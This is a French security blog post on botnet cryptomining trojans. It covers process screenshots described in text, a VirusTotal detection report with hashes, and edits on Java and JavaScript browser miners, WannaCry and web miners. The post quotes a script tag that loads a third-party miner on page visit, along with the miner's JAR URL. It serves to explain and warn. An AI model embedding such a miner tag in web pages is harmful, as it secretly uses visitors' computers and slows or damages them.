Menu Fermer

Trojan BitCoin et CoinMiner : Monétisation de Botnet

Dans le billet précédent CyberGate @ Numericable, je parlais de “Pour monétiser.
En effet le botmaster a aussi installé un Trojan.Bitcoin que l’on retrouve souvent avec ces RAT.
Dans cette page nous parlerons donc des trojan CoinMiner.
C’est à dire de programmes malveillants (trojan, cheval de troie) qui visent à utiliser l’ordinateur, à l’insu du propriétaire, afin de générer des bitcoin ou autre crypto-monnaie.
On parle alors de miner.

Trojan BitCoin et CoinMiner : Monétisation de Botnet

Mais qu’est ce que BitCoin ?

Concrètement, Bitcoin est une monnaie virtuelle dont une des méthodes pour gagner de l’argent est le minage.
Ce principe consiste à vérifier les transactions faites en bitcoin, nécessitant une puissance de calcul et énergie à travers leurs ordinateurs, les miners sont rémunérés en retour.

D’autre part, Bitcoin permet de faire transiter de l’argent plus ou moins de manière anonyme, ce qui peut permettre de transférer des sommes entre Cybercriminel ou éventuellement de blanchir de l’argent.

Par la suite, de nouvelles monnaies virtuelles ont vu le jour, le principe est grosso modo identique.
Pour plus d’informations, se rendre sur notre dossier : Comprendre les crypto-monnaie ou monnaie virtuelle : Bitcoin, Ethereum, etc

Trojan Bitcoin

Comme vous le savez, les botnets peuvent servir à gagner de l’argent, sous diférentes méthodes :

Depuis Juin 2011, une nouvelle méthode consiste à utiliser les ordinateurs du botnet et de les faire miner pour générer des bitcoins.

L’opération se fait en faisant tout simplement installer un programme qui va tourner en fond et utiliser la CPU de l’ordinateur infecté pour miner.
La majorité de ces programmes sont assez bourrins et tournent à 100 de CPU ce qui est pas très discret.
Mais on peut imaginer par la suite des modules plus intelligents qui se calquent à la puissance du CPU pour ne pas ralentir le PC et être plus discret.

Exemple de Trojan Bitcoin

Ci-dessus, on peut constater qu’un processus SystemMiner en .Net a été installé.
Ce dernier lance à son tour des processus bitcoin-miner.exe
Et plus bas un miner.exe qui est à fond la caisse au niveau CPU, ce dernier génère des bitcoins.

Trojan BitCoin : Monétisation de Botnet

Si l’on suspend miner.exe, ce sont les autres processus bitcoin-miner.exe qui prenne le relai pour utiliser la CPU et générer des bitcoins.

Trojan BitCoin : Monétisation de Botnet

Comme le montre ces captures d’écran et comme expliqué plus haut, ces miners ne sont pas très discrets puisqu’ils plombent la CPU et ralentissent l’ordinateur.
L’utilisateur de l’ordinateur va donc vite s’apercevoir que quelque chose ne tourne pas rond.
Voici un exemple de détection d’un miner BitCoin :

File name: smona131594996965193399859
Submission date: 2011-09-13 21:45:01 (UTC)
Current status: finished
Result: 22 /43 (51.2%)	VT Community

Compact
Print results  Antivirus	Version	Last Update	Result
AhnLab-V3	2011.09.13.00	2011.09.13	Trojan/Win32.BitMiner
AntiVir	7.11.14.189	2011.09.13	SPR/Tool.BitCoinMiner.a.6
Antiy-AVL	2.0.3.7	2011.09.13	RiskTool/Win32.BitCoinMiner.gen
Avast	4.8.1351.0	2011.09.13	-
Avast5	5.0.677.0	2011.09.13	-
AVG	10.0.0.1190	2011.09.13	BitCoinMiner.A
BitDefender	7.2	2011.09.13	Application.BitCoinMiner.B
ByteHero	None	2011.09.13	-
CAT-QuickHeal	11.00	2011.09.13	-
ClamAV	0.97.0.0	2011.09.13	-
Commtouch	5.3.2.6	2011.09.13	-
Comodo	10102	2011.09.13	ApplicUnsaf.Win32.RiskTool.BitCoinMiner.A
DrWeb	5.0.2.03300	2011.09.13	Tool.BtcMine.2
Emsisoft	5.1.0.11	2011.09.13	Win32.SuspectCrc!IK
eSafe	7.0.17.0	2011.09.13	Win32.SPRTool.BitCoi
eTrust-Vet	36.1.8558	2011.09.13	-
F-Prot	4.6.2.117	2011.09.13	-
F-Secure	9.0.16440.0	2011.09.13	Application.BitCoinMiner.B
Fortinet	4.3.370.0	2011.09.11	HackerTool/BitCoinMiner
GData	22	2011.09.13	Application.BitCoinMiner.B
Ikarus	T3.1.1.107.0	2011.09.13	Win32.SuspectCrc
Jiangmin	13.0.900	2011.09.13	-
K7AntiVirus	9.112.5128	2011.09.13	Riskware
Kaspersky	9.0.0.837	2011.09.13	not-a-virus:RiskTool.Win32.BitCoinMiner.a
McAfee	5.400.0.1158	2011.09.13	Generic PUP.z!ga
McAfee-GW-Edition	2010.1D	2011.09.13	Generic PUP.z!ga
Microsoft	1.7604	2011.09.13	Program:Win32/CoinMiner
NOD32	6461	2011.09.13	a variant of Win32/BitCoinMiner
Norman	6.07.11	2011.09.13	-
nProtect	2011-09-13.01	2011.09.13	-
Panda	10.0.3.5	2011.09.13	-
PCTools	8.0.0.5	2011.09.13	-
Prevx	3.0	2011.09.13	-
Rising	23.74.03.03	2011.09.09	-
Sophos	4.69.0	2011.09.13	Bitcoin Miner
SUPERAntiSpyware	4.40.0.1006	2011.09.13	-
Symantec	20111.2.0.82	2011.09.13	-
TheHacker	6.7.0.1.293	2011.09.10	-
TrendMicro	9.500.0.1008	2011.09.13	-
TrendMicro-HouseCall	9.500.0.1008	2011.09.13	-
VBA32	3.12.16.4	2011.09.13	-
VIPRE	10466	2011.09.13	RiskTool.Win32.BitCoinMiner
ViRobot	2011.9.10.4666	2011.09.13	not-a-virus.RiskTool.Win32.BitCoinMiner.740352
Additional information
Show all
MD5   : 404fba79dc22aef44914498bfe3ba04f
SHA1  : e73acf50164d78c5c0102785a90c0618e2e53362
SHA256: bd51420383e3a71d6390c383b1d79ceefe4cb415d54d3a811e07b2371f025730

Autres exemples de Trojan Bitcoin

Si l’installation de trojan BitCoin par des RAT/Cybergate est courante. On assiste aussi à une généralisation, certainement car cela fonctionne bien et que les contre pouvoir sont faibles (le temps de se mettre en place etc) et le fait que le système est décentralisé, ça ne doit pas aider.

et en vidéo des trojans miners :

Supprimer les trojan bitcoin

Vous trouverez des fichiers qui expliquent comment désinfecter votre ordinateur et supprimer les Trojan Bitcoin : http://www.supprimer-virus.com/?s=miner
Notamment parmis les plus répandus, on trouve : Claymore Bitcoin

EDIT Avril 2012 – BitCoin a travers  Java

Ce n’est pas la première fois que je tombe sur ce cas, je tiens donc le signaler : des trojan bitcoin en Java.

Vu sur un site pourri… Firefox qui tente de lancer un jar. Par habitude, on pense à un exploit qui se lance.


Mais aucun dropper à l’horizon… Java qui bourrine au niveau de la CPU.
Du côté des connexions, on peux voir :

TCP_MISS/200 843 GET http://www.bitcoinplus.com/api/work/getwork?a=32 - DIRECT/184.106.146.244 application/json
TCP_MISS/200 843 GET http://www.bitcoinplus.com/api/work/getwork?a=32 - DIRECT/184.106.146.244 application/json

Au final, donc un client bitcoin en Java.

Le site en question qui lance le client ne contient qu’un appel à un javascript qui se charge ensuite de lancer le JAR :

<script src="//www.bitcoinplus.com/js/miner.js" type="text/javascript"></script><script type="text/javascript">BitcoinPlusMiner(1202421)</script>

L’adresse du Jar : http://www.bitcoinplus.com/jar/bitcoinplus-miner.jar

Ce n’est pas le site officiel de bitcoin (http://bitcoin.org)

Avast! ne bloque pas le chargement du jar :

Le code n’est pas forcément malveillant et bitcoin.com ne distribue pas de virus informatiques puisqu’au final c’est un client bitcoin en java.
Ici ce qui pose problème, c’est plutôt l’utilisation qui en est faite.
Cela reste une utilisation du PC à l’insu de son propriétaire pour générer de l’argent et en plus cela cause des ralentissements voire cela peut générer des plantages (et si le PC a un problème de refroidissement, cela peux causer des problèmes matériels).

Sur ce forum apparemment le webmaster a choisi cette méthode :
http://forum.gmod.biz/showthread.php?1540-Bitcoin-Mining
http://forum.gmod.biz/showthread.php?1576-Forum-java-application

Assez gênant !

EDIT – Juillet 2015 : Trojan Miner poussé par des PUPs/Adwares

Les PUPs/Adwares qui poussent des Troja Miner, voir la page : Quand les PUPs/Adwares abusent : Trojan Miner

EDIT – 22 Mai 2017 : Crypto-Monnaie et attaque MS17-010

Un edit de cette page autour des trojan bitcoin pour signaler que les ransomwares utilisent ce mode de paiement.
A tel point que lors de l’attaque de WannaCry, qui s’est aussi accompagné de pas mal de campagnes pour installer des trojan bitcoin.
Cela a peu jouer sur la valeur du bitcoin et faire gonfler artificiellement celle-ci.

Plusieurs exemple de campagnes de Trojan bitcoin : Wana Decryptor (aka WannaCry) et attaques MS17-010

EDIT – Septembre 2017 : le web miner ou miner depuis un site internet

Un nouvelle méthode qui devrait être de plus en plus utilisée, faire miner les visiteurs de sites internet.
Un JavaScript inclut sur les pages d’un site internet peut faire miner les ordinateurs des visiteurs.
Cela se traduit par l’augmentation de la charge CPU du navigateur internet

Plus d’informations : Les Web Miner : Minage de crypto-monnaie à partir des pages internet (JavaScript)